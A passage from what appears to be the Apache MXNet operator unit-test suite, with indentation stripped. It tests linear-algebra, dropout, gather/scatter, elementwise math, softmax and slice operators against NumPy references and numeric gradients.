data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: test fails intermittently when cudnn on. temporarily disabled cudnn until gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@with_seed()
def test_dropout_reproducibility():
info = np.iinfo(np.int32)
seed1 = np.random.randint(info.min, info.max)
seed2 = np.random.randint(info.min, info.max)
data = mx.nd.ones((100, 100), ctx=default_context())
dropout = mx.gluon.nn.Dropout(0.5)
mx.random.seed(seed1)
with mx.autograd.record():
result1 = dropout(data)
result2 = dropout(result1)
mx.random.seed(seed2)
with mx.autograd.record():
result3 = dropout(data)
result4 = dropout(result3)
mx.random.seed(seed1)
with mx.autograd.record():
result5 = dropout(data)
result6 = dropout(result5)
assert_almost_equal(result1.asnumpy(), result5.asnumpy())
assert_almost_equal(result2.asnumpy(), result6.asnumpy())
with assert_raises(AssertionError):
assert_almost_equal(result1.asnumpy(), result2.asnumpy())
with assert_raises(AssertionError):
assert_almost_equal(result1.asnumpy(), result3.asnumpy())
with assert_raises(AssertionError):
assert_almost_equal(result2.asnumpy(), result4.asnumpy())
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
